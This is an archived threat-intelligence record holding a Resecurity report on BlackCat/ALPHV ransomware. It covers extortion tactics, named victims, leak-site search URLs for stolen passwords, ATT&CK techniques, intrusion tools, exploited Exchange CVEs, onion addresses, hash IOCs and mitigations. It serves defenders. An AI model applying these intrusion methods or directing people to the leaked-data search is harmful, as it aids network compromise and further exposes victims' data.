{ "id": "ff5ea46d-a589-4fbc-a64f-76d610b1794e", "created_at": "2026-04-06T00:16:34.591351Z", "updated_at": "2026-04-10T03:29:39.819423Z", "deleted_at": null, "sha1_hash": "2b273a663877327c116b256bd92af5f2e853b427", "title": "Resecurity | BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1134805, "plain_text": "Resecurity | BlackCat (aka ALPHV) Ransomware is Increasing\r\nStakes up to $2,5M in Demands\r\nPublished: 2022-07-10 · Archived: 2026-04-05 13:01:38 UTC\r\nThe notorious cybercriminal syndicate competes with Conti and Lockbit 3.0. They introduced an advanced search\r\nby stolen victim’s passwords, and confidential documents leaked in the TOR network.\r\nResecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a\r\nsignificant increase in value of ransom demand requests by the notorious BlackCat ransomware gang. Such tactics\r\nsignificantly affect ransomware underground ecosystems, hitting businesses of different sizes hard worldwide.\r\nBased on the recently compromised victims in Nordics region, which haven’t been disclosed by the group yet, the\r\namount to be paid exceeds $2 million.\r\nBlackCat has been operating since at least November and has launched major attacks such as in January the\r\ndisruption of OilTanking GmbH, a German fuel company, and in February, the attack on an aviation company,\r\nSwissport. Most recently, the ransomware group claimed responsibility for attacks against two universities in the\r\nU.S., Florida International University, and the University of North Carolina A\u0026T.\r\nAccording to experts from Resecurity, BlackCat ransomware actors began defining $2,5 million ransom demands,\r\nwith a possible discount close to half, motivating the victim to resolve the incident as soon as possible. The\r\naverage time allocated for payment varies between 5-7 days, to give victim some time to purchase BTC or XMR\r\ncryptocurrency. In case of difficulties, the victim may engage an “intermediary” for further recovery process.\r\nThe average ransomware payment climbed 82% since 2020 to a record high of $570,000 in the first half of 2021,\r\nand then by 2022 it almost doubled. The latest forecast is for global ransomware extortion activity to reach $265\r\nbillion by 2031, with total damages for businesses valued at $10,5 trillion globally. Such metrics would make\r\nransomware the world's largest \"shadow economy\", generating more damage in expenses than natural disasters.\r\nUnfortunately, despite guidance of DOJ not to pay ransom, over 48% of the impacted organizations had to pay\r\ncybercriminals due to no alternative options available to recover their operations timely.\r\nExample of Blackcat ransomware payment landing page with the deadline of payment by July 14th\r\nBlackCat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups\r\npracticing so called “quadruple extortion” pressing victims to pay:\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 1 of 10\n\n1. Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop\r\nworking because key files are encrypted.\r\n2. Data Theft: Hackers release sensitive information if a ransom is not paid. As proof, the bad actors share an\r\nexample of the stolen data or send a listing of stolen files to avoid any legitimacy doubts.\r\n3. Denial of Service (DoS): Ransomware gangs launch denial of service attacks that shut down a victim’s\r\npublic websites.\r\n4. Harassment: Cybercriminals contact customers, business partners, employees, and media to tell them the\r\norganization was hacked.\r\nThe BlackCat is also known as \"ALPHV\", or \"AlphaVM\" and \"AphaV\", a ransomware family created in the Rust\r\nprogramming language. In April the FBI published a flash alert about BlackCat ransomware naming the group as\r\none of the top ransomware threats. The name “BlackCat” is coming from a specific icon used in the landing page\r\nfor ransom payment:\r\nNotably, despite the fact BlackCat and Alpha have completely different URLs in TOR Network, the scenarios used\r\non their pages are identical, and likely developed by the same actors.\r\nhttp://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion\r\nhttp://wnlwdb6yumubpjwpnwvek6qs4mpudmhy7tyulaqbxmztgreobaevqkid[.]onion\r\nThe URL used for victim landing page typically includes symbols “access key”.\r\nhttp://richfjtyp3wv7qmwuoolchurgyo52u64fkz634a5zh7tzweqwiukiuid.onion/?access-key=\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 2 of 10\n\nToday the group published new victims - COUNT+CARE Gmbh (an information technology and services\r\ncompany from Germany), following Dusit D2 Kenz Hotel in Dubai, Sinclair Wilson (an accounting and wealth\r\nmanagement services firm from Australia) and Adler Display out of Baltimore, Maryland.\r\nJapanese gaming giant Bandai Namco and aerospace sensor Maker Hydra-Electric from Burbank, California.\r\nThe group is publishing new victims almost every 4 days. Notably, there is a certain difference between BlackCat\r\nand AlphV in their ‘modus operandi’ of the extortion techniques – the last is publicly shaming victims by using\r\ntheir resource in the TOR network, while the first one - remains low-key and stealth attacking high-profile targets\r\nwithout further significant disclosure.\r\nDecember 4, 2021 – AlphV published a posting in Dark Web, searching for experienced penetration testing\r\nspecialists to compromise targets of interest. They published 2 TOX IM contacts and Jabber:\r\nBased on the analysis of the latest incidents, BlackCat adds a randomized 6 symbols extension, for e.g. \".sxuetaf”,\r\nafter file encryption similar Lockbit (7 symbols), NetWalker (6 symbols) and Locky ransomware (5 symbols).\r\nNotably, there were identified multiple victims by Blackhat having 7 symbols extension as Lockbit 2.0 strain.\r\nThe actors were one of the first who introduced “search” in a leaked data. It allows employees and customers of\r\nthe affected company to check if their data has been exposed.\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 3 of 10\n\nIn a recent post from 10 Jul 2022, 15:35 pm in Dark Web, the group introduced search not only by text signatures,\r\nbut also supporting tags for search of passwords and compromised PII\r\nTranslation:\r\nDear forum users, we want to introduce you our repository of leaks with search feature.\r\nOn our resource you may always quickly find documents (IDs, DL, SSN), access credentials, passwords,\r\nconfidential information by company name, and a lot more!\r\nInformation imported into the system has been acquired by our team from the real victims’ networks. The search\r\ncan be performed by name of the file/folders, but also content (of the file), including images. The tool will find text\r\nrecognized on the image, including in the body of PDF document.\r\nExamples:\r\n- Search by the name of the company (victim):\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=”JP Morgan”\r\n- Search of passwords:\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=password:\r\n- Search of confidential documents\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 4 of 10\n\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=”non disclosure\r\nagreement”\r\nEverything is absolutely for free and “as is”.\r\nIt seems to be that some of the stolen files are still under indexing, but majority is already available for quick\r\nnavigation.\r\nThere were over 2,270 indexed documents identified containing access credentials and password information in\r\nplaintext, and over 100,000 documents containing confidential marking.\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 5 of 10\n\nALPHV seems to be significantly competing with LOCKBIT and CONTI – another actively developing\r\nransomware syndicates who called ALPHV “scammers”. Likely, the statement was related to some conflict and\r\nissues between initial access brokers (IABs), affiliates and team members who could be associated with both\r\nprojects at different stages.\r\nALPHV has been associated with two other ransomware groups: DarkSide and BlackMatter. Design overlaps\r\nbetween ALPHV and DarkSide have prompted rumors that ALPHV was a rebrand of DarkSide following the\r\nlatter’s high-profile attack on the Colonial Pipeline.\r\nOn underground cybercriminal forums, the representative of the “LockBit” ransomware also initiated threads to\r\nstate that ALPHV was a rebrand of DarkSide and BlackMatter RaaS programs. While ALPHV denied to be a\r\nrebrand of DarkSide or BlackMatter, developers and money launderers from ALPHV are linked to\r\nDarkSide/BlackMatter, according to the FBI. Therefore, while ALPHV may not be a rebrand, it is likely that the\r\ngroup recruited many members from these now inactive ransomware gangs.\r\nOne of the first public appearances of ALPHV occurred on the RAMP cybercriminal forum on 09 Dec 2021,\r\nwhere a representative of the group promoted the ALPHV RaaS program and attempted to recruit affiliates. In this\r\npost, ALPHV operators advertised the new “ALPHV-ng (New Generation)” RaaS partner program, which they\r\ndescribed as the next generation of ransomware. The ransomware had been written from scratch and have many\r\nfeatures, including:\r\nFour encryption modes: full, fast, DotPattern, and Auto. It uses the two encryption algorithms ChaCha20\r\nand AES.\r\nInfrastructure fragmented with nodes that are interconnected and located behind “NAT + FW”. The\r\ninfrastructure is set up so that attackers will not reveal the real IP addresses of their servers when receiving\r\ncmdshells.\r\nFunctional on different platforms including various versions of Linux (ESXI, Debian, Ubuntu, and\r\nReadyNas) and all versions from Windows 7 and above.\r\nGenerated “a unique onion domain” for “each new victim”.\r\nResecurity’s HUNTER unit noticed significant developments on RAMP forum (ransomware underground\r\ncommunity) and expects to see more activity from competing groups including Lockbit 3.0.\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 6 of 10\n\nActors involved in the ransomware business are trying to isolate themselves from semi-public or well-recognized\r\nDark Web forums, they’re doing this to create a community of vetted initial access brokers, developers of\r\nransomware, and actors involved in other related operations.\r\nMITRE ATT\u0026CK:\r\n[T1592] Gather Victim Host Information\r\n[T1586] Compromise Accounts\r\n[T1490] Inhibit System Recovery\r\n[T1590] Gather Victim Network Information\r\n[T1486] Data Encrypted for Impact\r\n[T1040] Network Sniffing\r\n[T1133] External Remote Services\r\n[T1098] Account Manipulation\r\n[T1053] Scheduled Task/Job\r\n[T1078] Valid Accounts\r\n[T1484] Domain Policy Modification\r\n[T1222] File and Directory Permissions Modifications\r\n[T1036] Masquerading\r\n[T1003] OS Credentials Dumping\r\n[T1528] Steal Application Access Token\r\n[T1558] Steal or Forge Kerberos Tickets\r\n[T1212] Exploitaton for Credentials Access\r\n[T1555] Credentials from Password Stores\r\n[T1482] Domain Trust Discovery\r\n[T1083] File and Directory Discovery\r\n[T1615] Group Policy Discovery\r\n[T1072] Software Deployment Tools\r\n[T1020] Automated Exfiltration\r\n[T1048] Exfiltration over Alternative Protocol\r\n[T1537] Transfer Data to Cloud Account\r\nTooling:\r\nBlackCat arsenal employs multiple tools for network intrusions and post-exploitation targeting Active Directory\r\nincluding but not limited to:\r\n- ADRecon, network reconnaissance tool for Windows environment;\r\n- Cobalt Strike, post-exploitation framework;\r\n- PsExec tool for lateral movement in the victim’s network;\r\n- Mimikatz, the well-known hacker software;\r\n- Nirsoft software to extract network passwords.\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 7 of 10\n\nDue to a significant number of affiliates and independent initial access brokers (IABs) collaborating with\r\nBlackCat group, the tooling may vary. As the most commonly seen in the result of DFIR engagements:\r\n- Bloodhound tool\r\n- Softperfect Netscan\r\n- CrackMapExec\r\n- Inveigh/InveighZero\r\n- MegaSync\r\n- RClone\r\n- Adfind\r\n- Rubeus\r\n- Stealbit\r\nExMatter, an exfiltration tool that has earlier been seen in the arsenal of BlackMatter affiliates\r\nSome of these tools are packaged and dropped on the victim's machine in form of dropper (.bat or PowerShell\r\nscenario).\r\nTactics \u0026 Procedures:\r\nWhile the approach used by BlackCat is not unique, and widely used by other actors attacking enterprise\r\nnetworks, the following aspects may be relevant to Ransomware activity:\r\n- Using SysVol Share to store BlackCat Cryptor (locker) to replicate it across other hosts within the same Active\r\nDirectory domain;\r\n- The malware usnice.\r\nes Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy ransomware.\r\n- Active exploitation of CVE-2021-31207, CVE-2021-34473, and CVE-2021-34523 to target Microsoft Exchange.\r\n- Evasive tactics, such as masking a tampered DLL to make it seem legitimate.\r\n- Before the encryption process, the actors perform comprehensive preparation to prevent possible roll-back to\r\nnormal operations from possible backups stored in the network.\r\nIn Linux environments once initial access is obtained, actors establish reverse SSH tunnels as a command-and-control (C2) channel between victims and BlackCat infrastructure.\r\nKnown TOR nodes:\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.onion]\r\njjeqizt46yqydabjkdkfsiptzfzcbzjkcaou77v7ljoxgsyg3e5luqqd[.onion]\r\npmpkjv36ca5ykwmjnfnr5cadctt4ldcekaxocbwa57btujhi7mly6kid[.onion]\r\nhzdpwv5jqjcbstv5kassyxztdkacwi4ucleomgpqmxcwan5ydzqh5mid[.onion]\r\nid7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad[.onion]\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 8 of 10\n\nsty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd[.onion]\r\nhtnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd[.onion]\r\naoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd[.onion]\r\n5e2q3uzczl3bur23dxfxxu5unlukuqrlseesmxc7v7dmo4qgbr3kaxqd[.onion]\r\nvldmvht6s253et33ce6gcth2vikuvsi7xgkzim5frqiowq6an6tmlaad[.onion]\r\nkxmbveamxzfrnxacprpbldcy3p263kvrjiblaw4p55mzrkaf3si6w4id[.onion]\r\ndoh3rlqtvg24yu4r4w7bk5twm7w6nm7wqsr3d3roc7jisrdqf5catnad[.onion]\r\ndcoezwwwxij2trzd3oqhtyjg3lgvgzmyzrj2pcs3rdfh4tl5267dwpyd[.onion]\r\ns5hcgpxzeehnkwlpb3xkelvkv6rpi5rszmhfeywncja26bxdzexp6zqd[.onion]\r\noylk6phjrgcjvhv5rjijwrpcqj4ig3f2evbxb6lzofw7cbgxlpetq7ad[.onion]\r\nfbehz3443h644jrcu3djvexhplhmnijilkq54puzrxuvloc42oykgiad[.onion]\r\nkv7nxc6sg625vl4rd4fsy4asero3jqivp7zyhaohsyww2xnk7r7yenyd[.onion]\r\nacvhxy4cc52a7iv7ugc4eq6dq6nus2s5xduew7s2wkaw6nhftasyq2yd[.onion]\r\nwnlwdb6yumubpjwpnwvek6qs4mpudmhy7tyulaqbxmztgreobaevqkid[.onion]\r\nzf3raijx7m6xm72uenqrql5b2qtkbvnxi7fgzqjxfcizp7lylmvzvdid[.onion]\r\nsmo3gebcr5mkff7ja5ayi2xdz2xsapdixak4eosj5ah6fgrbluoxrkqd[.onion]\r\n2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid[.onion]\r\nvqifktlreqpudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd[.onion]\r\njrq44df5h2xysjsajuidspv7zxl7g7v7viujicudptufaozi2i65cnad[.onion]\r\ncfj4bsnfi4ktpfoei7uqggz5sb443fhvvbkxbmu3dhfriomg2txxgxid[.onion]\r\nzujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd[.onion]\r\ns7isfnfsrrnogkkvzzmqpqlcehajalaht5nmel7nbxwhvqc52jj2ejid[.onion]\r\nmu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd[.onion]\r\nIOCs:\r\nf815f5d6c85bcbc1ec071dd39532a20f5ce910989552d980d1d4346f57b75f89\r\nc3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40\r\n74464797c5d2df81db2e06f86497b2127fda6766956f1b67b0dcea9570d8b683\r\n4e18f9293a6a72d5d42dad179b532407f45663098f959ea552ae43dbb9725cbf\r\n1af1ca666e48afc933e2eda0ae1d6e88ebd23d27c54fd1d882161fd8c70b678e\r\n15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\r\n13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\r\nc8b3b67ea4d7625f8b37ba59eed5c9406b3ef04b7a19b97e5dd5dab1bd59f283\r\nbd337d4e83ab1c2cacb43e4569f977d188f1bb7c7a077026304bf186d49d4117\r\n7b2449bb8be1b37a9d580c2592a67a759a3116fe640041d0f36dc93ca3db4487\r\n38834b796ed025563774167716a477e9217d45e47def20facb027325f2a790d1\r\n2cf54942e8cf0ef6296deaa7975618dadff0c32535295d3f0d5f577552229ffc\r\n28d7e6fe31dc00f82cb032ba29aad6429837ba5efb83c2ce4d31d565896e1169\r\n0c6f444c6940a3688ffc6f8b9d5774c032e3551ebbccb64e4280ae7fc1fac479\r\nf8c08d00ff6e8c6adb1a93cd133b19302d0b651afd73ccb54e3b6ac6c60d99c6\r\n731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161\r\n59868f4b346bd401e067380cac69080709c86e06fae219bfb5bc17605a71ab3f\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 9 of 10\n\n3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83\r\n7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e\r\ncefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae\r\nMitigation Strategies:\r\nReview domain controllers, servers, workstations, and active directories for new or unrecognized user\r\naccounts.\r\nRegularly back up data, air gap, and password protect backup copies offline. Ensure copies of critical data\r\nare not accessible for modification or deletion from the system where the data resides.\r\nReview Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating system\r\ndefined or recognized scheduled tasks for unrecognized “actions” (for example: review the steps each\r\nscheduled task is expected to perform).\r\nReview antivirus logs for indications they were unexpectedly turned off.\r\nImplement network segmentation.\r\nRequire administrator credentials to install software.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and\r\nservers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\r\nInstall updates/patch operating systems, software, and firmware as soon as updates/patches are released.\r\nUse multifactor authentication where possible.\r\nRegularly change passwords to network systems, accounts, and avoid reusing passwords for different\r\naccounts.\r\nImplement the shortest acceptable timeframe for password changes.\r\nDisable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\r\nAudit user accounts with administrative privileges and configure access controls with least privilege in\r\nmind.\r\nInstall and regularly update antivirus and anti-malware software on all hosts.\r\nOnly use secure networks and avoid using public Wi-Fi networks. Consider installing and using a virtual\r\nprivate network (VPN).\r\nConsider adding an email banner to emails received from outside your organization.\r\nDisable hyperlinks in received emails.\r\nSource: https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands" ], "report_names": [ "blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands" ], "threat_actors": [ { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434594, "ts_updated_at": 1775791779, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.pdf", "text": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.txt", "img": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.jpg" } }